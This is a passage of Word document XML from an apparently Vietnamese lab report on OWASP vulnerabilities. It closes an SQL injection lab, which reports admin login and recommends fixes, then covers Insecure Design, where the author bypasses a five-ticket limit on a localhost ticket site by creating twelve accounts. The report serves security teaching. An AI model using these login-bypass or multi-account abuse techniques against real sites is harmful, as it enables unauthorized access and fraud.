      <w:r w:rsidR="009D0400" w:rsidRPr="00907DBD">
        <w:t xml:space="preserve"> Thực hiện đăng nhập và kiểm tra kết quả thấy đăng nhập thành công</w:t>
      </w:r>
      <w:r w:rsidR="009D0400">
        <w:t xml:space="preserve"> với quyền admin</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00907DBD">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0A5E03" w14:textId="77777777" w:rsidR="009D0400" w:rsidRPr="00FA486A" w:rsidRDefault="009D0400" w:rsidP="00FA486A">
      <w:r w:rsidRPr="00FA486A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78C4854E" wp14:editId="263AE7C4">
            <wp:extent cx="6115050" cy="2609215"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1980512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12582" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId62"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2609215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC54825" w14:textId="3A04EA1E" w:rsidR="009D0400" w:rsidRPr="00FA486A" w:rsidRDefault="009D0400" w:rsidP="00FA486A">
      <w:r w:rsidRPr="00FA486A">
        <w:t>Tổng quát hóa lên và có thể thử nhiều trường hợp khác nhau, nhưng cùng đúng bản chất thì sẽ đăng nhập thành công với quyền admin</w:t>
      </w:r>
      <w:r w:rsidR="00FA486A">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F654D0A" w14:textId="59A3023C" w:rsidR="009D0400" w:rsidRPr="009D0400" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="00907DBD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CDA095E" wp14:editId="13A639B6">
            <wp:extent cx="6115050" cy="2548255"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="856331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31974" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId63"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2548255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="250A50D4" w14:textId="602D253F" w:rsidR="009D0400" w:rsidRPr="00FA486A" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Mức độ ảnh hưởng của lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidR="001F070A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FA486A" w:rsidRPr="00FA486A">
        <w:t xml:space="preserve">High (cao) vì lỗ </w:t>
      </w:r>
      <w:r w:rsidR="001F070A" w:rsidRPr="00FA486A">
        <w:t>hổng này có thể cho phép kẻ tấn công truy cập trái phép vào hệ thống với quyền admin</w:t>
      </w:r>
      <w:r w:rsidR="00FA486A" w:rsidRPr="00FA486A">
        <w:t xml:space="preserve"> thông qua việc thực hiện chèn câu lệnh SQL vào trường input mà không có xác thực</w:t>
      </w:r>
      <w:r w:rsidR="00FA486A">
        <w:t xml:space="preserve"> hay lọc</w:t>
      </w:r>
      <w:r w:rsidR="001F070A" w:rsidRPr="00FA486A">
        <w:t>, gây nguy cơ rò rỉ dữ liệu và chiếm quyền kiểm soát hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5558BBAA" w14:textId="77777777" w:rsidR="009D0400" w:rsidRPr="001A7605" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khuyến cáo khắc phục:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A7605">
        <w:t xml:space="preserve">Sử dụng các phương pháp Prepared Statements hoặc Parametrized Queries: Thay vì tạo truy vấn SQL bằng cách kết hợp chuỗi, sử dụng các câu lệnh truy vấn được thực thi trước đó và thêm tham số vào câu lệnh. Điều này giúp tránh được việc chèn dữ liệu người dùng trực tiếp vào truy vấn SQL. Ngoài ra còn một số cách khác như: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48245B8C" w14:textId="20CE5C87" w:rsidR="009D0400" w:rsidRPr="001A7605" w:rsidRDefault="009D0400" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001A7605">
        <w:t>Kiểm tra và làm sạch dữ liệu đầu vào để loại bỏ các ký tự đặc biệt và câu lệnh nguy hiểm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D8EE30" w14:textId="1E487959" w:rsidR="009D0400" w:rsidRPr="001A7605" w:rsidRDefault="009D0400" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001A7605">
        <w:t>Áp dụng nguyên tắc Least Privilege để giới hạn quyền truy cập của người dùng và ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CB9622" w14:textId="213CA139" w:rsidR="009D0400" w:rsidRPr="001A7605" w:rsidRDefault="009D0400" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001A7605">
        <w:t>Băm mật khẩu kết hợp với xác thực bên thứ 3</w:t>
      </w:r>
      <w:r w:rsidR="00FA486A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A7605">
        <w:t>(telegram, zalo,…).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DD1C54" w14:textId="77777777" w:rsidR="00B528F8" w:rsidRDefault="00B528F8">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="68092B4E" w14:textId="58020DED" w:rsidR="00151DDF" w:rsidRPr="00151DDF" w:rsidRDefault="00151DDF" w:rsidP="00151DDF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc182909841"/>
      <w:r w:rsidRPr="00955E98">
        <w:lastRenderedPageBreak/>
        <w:t>A04:2021 – Insecure Design</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="13F5A36B" w14:textId="15D10B67" w:rsidR="00151DDF" w:rsidRDefault="00151DDF" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc182909842"/>
      <w:r w:rsidRPr="00151DDF">
        <w:t>Mô tả lỗ hổng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="518AFA77" w14:textId="059818C1" w:rsidR="00151DDF" w:rsidRPr="00FA486A" w:rsidRDefault="001A7605" w:rsidP="00FA486A">
      <w:r w:rsidRPr="00FA486A">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="00FA486A">
        <w:t>Thiết kế không an toàn là một thể loại rộng đại diện cho các điểm yếu khác nhau, đ</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="00FA486A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="00FA486A">
        <w:t>ợc thể hiện là thiết kế kiểm soát thiếu hoặc không hiệu quả. Thiết kế không an toàn không phải là nguồn của tất cả 10 loại rủi ro hàng đầu khác. Có một sự khác biệt giữa thiết kế không an toàn và thực hiện không an toàn. Việc phân biệt giữa lỗ hổng thiết kế và khiếm khuyết thực hiện vì một vài lý do, trong đó chúng có nguyên nhân gốc rễ gây ra lỗi và cách khắc phục khác nhau. Một thiết kế an toàn vẫn có các khiếm khuyết thực hiện, dẫn đến các lỗ hổng có thể đ</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="00FA486A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="00FA486A">
        <w:t>ợc khai thác. Một thiết kế không an toàn thì khác, nó không thể sửa chữa bằng việc triển khai hoàn hảo vì theo thiết kế của nó, các kiểm soát bảo mật cần thiết không đ</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="00FA486A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="00FA486A">
        <w:t>ợc tạo để chống lại các cuộc tấn công cụ thể.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC49994" w14:textId="035AAB0B" w:rsidR="007C70D3" w:rsidRDefault="007C70D3" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc182909843"/>
      <w:r>
        <w:t xml:space="preserve">Biện pháp </w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26">
        <w:t>ngăn chặn</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="190DA409" w14:textId="66C24A51" w:rsidR="007C70D3" w:rsidRPr="00FA486A" w:rsidRDefault="007C70D3" w:rsidP="00FA486A">
      <w:r w:rsidRPr="00FA486A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Tham khảo ý kiến hay nhận lời tư vấn từ các chuyên gia bảo mật từ khi bắt đầu dự án và trong suốt vòng đời phát triển.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA486A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA486A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA486A">
        <w:t xml:space="preserve"> Khi phát triển một ứng dụng thương mại điện tử, tham vấn chuyên gia bảo mật về bảo vệ dữ liệu thẻ tín dụng ngay từ giai đoạn thiết kế và trong suốt quá trình phát triển ứng dụng giúp tránh các lỗ hổng tiềm tàng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFAEF61" w14:textId="0EF92D85" w:rsidR="007C70D3" w:rsidRPr="00FA486A" w:rsidRDefault="00CC33CE" w:rsidP="00FA486A">
      <w:r w:rsidRPr="00FA486A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="007C70D3" w:rsidRPr="00FA486A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sử dụng mô hình hóa mối đe dọa</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA486A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Threat Modeling)</w:t>
      </w:r>
      <w:r w:rsidR="007C70D3" w:rsidRPr="00FA486A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> để phân tích và xác định các điểm yếu trong hệ thống trước khi triển khai.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA486A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C70D3" w:rsidRPr="00FA486A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidR="007C70D3" w:rsidRPr="00FA486A">
        <w:t xml:space="preserve"> Trong một ứng dụng quản lý tài sản, sử dụng mô hình hóa mối đe dọa để xác định các điểm có thể bị lạm dụng trong quy trình xử lý giao dịch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D4A9F7" w14:textId="5487AF84" w:rsidR="007C70D3" w:rsidRPr="00FA486A" w:rsidRDefault="00CC33CE" w:rsidP="00FA486A">
      <w:r w:rsidRPr="00FA486A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="007C70D3" w:rsidRPr="00FA486A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Xem xét kỹ lưỡng các vector tấn công có thể tác động đến ứng dụng web và mức độ mà chúng có thể bị khai thác.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA486A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C70D3" w:rsidRPr="00FA486A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidR="007C70D3" w:rsidRPr="00FA486A">
        <w:t xml:space="preserve"> Đối với một ứng dụng ngân hàng trực tuyến, phải xem xét các vector như tấn công man-in-the-middle hoặc các cuộc tấn công từ các thiết bị di động không an toàn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C526F9D" w14:textId="377FBA26" w:rsidR="007C70D3" w:rsidRPr="00FA486A" w:rsidRDefault="00CC33CE" w:rsidP="00FA486A">
      <w:r w:rsidRPr="00FA486A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="007C70D3" w:rsidRPr="00FA486A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phân tích và tái phân tích tất cả các luồng dữ liệu, đặc biệt là những luồng kháng lại mô hình hóa mối đe dọa</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA486A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA486A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C70D3" w:rsidRPr="00FA486A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidR="007C70D3" w:rsidRPr="00FA486A">
        <w:t xml:space="preserve"> Đối với một ứng dụng quản lý dữ liệu y tế, cần phân </w:t>
      </w:r>
      <w:r w:rsidR="007C70D3" w:rsidRPr="00FA486A">
        <w:lastRenderedPageBreak/>
        <w:t>tích kỹ lưỡng luồng dữ liệu giữa các module và xem xét cách bảo vệ dữ liệu nhạy cảm khỏi các cuộc tấn công tiềm ẩn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211E4081" w14:textId="1D689F09" w:rsidR="007C70D3" w:rsidRPr="00FA486A" w:rsidRDefault="00CC33CE" w:rsidP="00FA486A">
      <w:r w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="007C70D3" w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sử dụng Security Assurance Maturity Model (SAMM) </w:t>
      </w:r>
      <w:r w:rsidR="00FA486A" w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">để </w:t>
      </w:r>
      <w:r w:rsidR="007C70D3" w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">làm hướng dẫn </w:t>
      </w:r>
      <w:r w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">các </w:t>
      </w:r>
      <w:r w:rsidR="007C70D3" w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>phương pháp phát triển phần mềm an toàn và định hướng các tiêu chuẩn cần tuân theo.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA486A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C70D3" w:rsidRPr="00FA486A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidR="007C70D3" w:rsidRPr="00FA486A">
        <w:t xml:space="preserve"> Thực hiện kiểm tra bảo mật định kỳ theo SAMM để đảm bảo rằng ứng dụng vẫn tuân thủ các tiêu chuẩn bảo mật ngay cả khi có các thay đổi mới trong mã nguồn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB782B7" w14:textId="77777777" w:rsidR="00151DDF" w:rsidRPr="00151DDF" w:rsidRDefault="00151DDF" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc182909844"/>
      <w:r w:rsidRPr="00151DDF">
        <w:t>Kịch bản tấn công thực hành</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="57A13E0B" w14:textId="7FC72F87" w:rsidR="00031203" w:rsidRDefault="00031203" w:rsidP="00031203">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc182909845"/>
      <w:r w:rsidRPr="00031203">
        <w:t>Bài thực hành – Lab 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="7764B128" w14:textId="769244DF" w:rsidR="004E0865" w:rsidRPr="004E0865" w:rsidRDefault="004E0865" w:rsidP="004E0865">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E0865">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Truy cập vào: </w:t>
      </w:r>
      <w:hyperlink r:id="rId64" w:history="1">
        <w:r w:rsidRPr="004E0865">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://localhost:8000/insecure-design_lab</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1CC3FF07" w14:textId="6B0D8204" w:rsidR="009D0400" w:rsidRPr="005D0569" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tiêu đề: </w:t>
      </w:r>
      <w:r w:rsidRPr="00062BD8">
        <w:t>Insecure Design</w:t>
      </w:r>
      <w:r w:rsidR="004E0865">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057E73CD" w14:textId="4F0C0D4A" w:rsidR="009D0400" w:rsidRPr="00FA486A" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô tả lỗ hổng:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA486A">
        <w:t>Các nhà phát triển web thiết kế web không an toàn dẫn đến mất nhiều profit (vé)</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="00FA486A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2D2B4E" w14:textId="77777777" w:rsidR="009D0400" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các bước thực hiện khai thác và bằng chứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A32D9D" w14:textId="53FDBDB4" w:rsidR="009D0400" w:rsidRDefault="00FA486A" w:rsidP="009D0400">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00211DB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00E9180E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008F6347">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="008F6347">
        <w:t xml:space="preserve">hử tạo tài khoản truy cập vào mua vé, và mua được </w:t>
      </w:r>
      <w:r w:rsidRPr="008F6347">
        <w:t xml:space="preserve">tối đa là </w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="008F6347">
        <w:t>5 vé</w:t>
      </w:r>
      <w:r w:rsidRPr="008F6347">
        <w:t xml:space="preserve">. Sau đó </w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="008F6347">
        <w:t xml:space="preserve">nhấn Claim 1 lần nửa thì biết </w:t>
      </w:r>
      <w:r w:rsidRPr="008F6347">
        <w:t xml:space="preserve">được </w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="008F6347">
        <w:t>số vé còn là 55. Tức là tổng cộng có 60 vé.</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00CF205D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0319A3ED" w14:textId="77777777" w:rsidR="009D0400" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F26EE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28F71B34" wp14:editId="2ADB6C2A">
            <wp:extent cx="6115050" cy="1785620"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1255245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45085" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId65"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1785620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B25DF1" w14:textId="02DEC58B" w:rsidR="009D0400" w:rsidRDefault="008F6347" w:rsidP="009D0400">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00211DB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00E9180E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="008F6347">
        <w:t>Lý do là việc mua vé này không kiểm soát việc ai hay máy nào tạo tài khoản thì việc một người tạo nhiều tài khoản và lấy vé sẽ không kiểm soát được. Vậy để lấy hết toàn bộ số vé để xem phim được thì thực hiện tạo 12 tài khoản với mỗi tài khoản lấy 5 vé.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACAABCA" w14:textId="026C3BF9" w:rsidR="009D0400" w:rsidRPr="008F6347" w:rsidRDefault="008F6347" w:rsidP="008F6347">
      <w:r w:rsidRPr="008F6347">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="008F6347">
        <w:t>hực hiện lần lượt đăng ký tài khoản và nhận vé:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2D288E" w14:textId="77777777" w:rsidR="009D0400" w:rsidRPr="00E9180E" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="00CF205D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ED14BAB" wp14:editId="7E50B2BD">
            <wp:extent cx="6115050" cy="2507615"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="1386150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150115" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2507615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B79CBC8" w14:textId="77777777" w:rsidR="009D0400" w:rsidRPr="00E9180E" w:rsidRDefault="009D0400" w:rsidP="009D0400"/>
    <w:p w14:paraId="2A8B8103" w14:textId="77777777" w:rsidR="009D0400" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF205D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78E5F1C5" wp14:editId="28790F2D">
            <wp:extent cx="6115050" cy="2420620"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1491187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87270" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2420620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
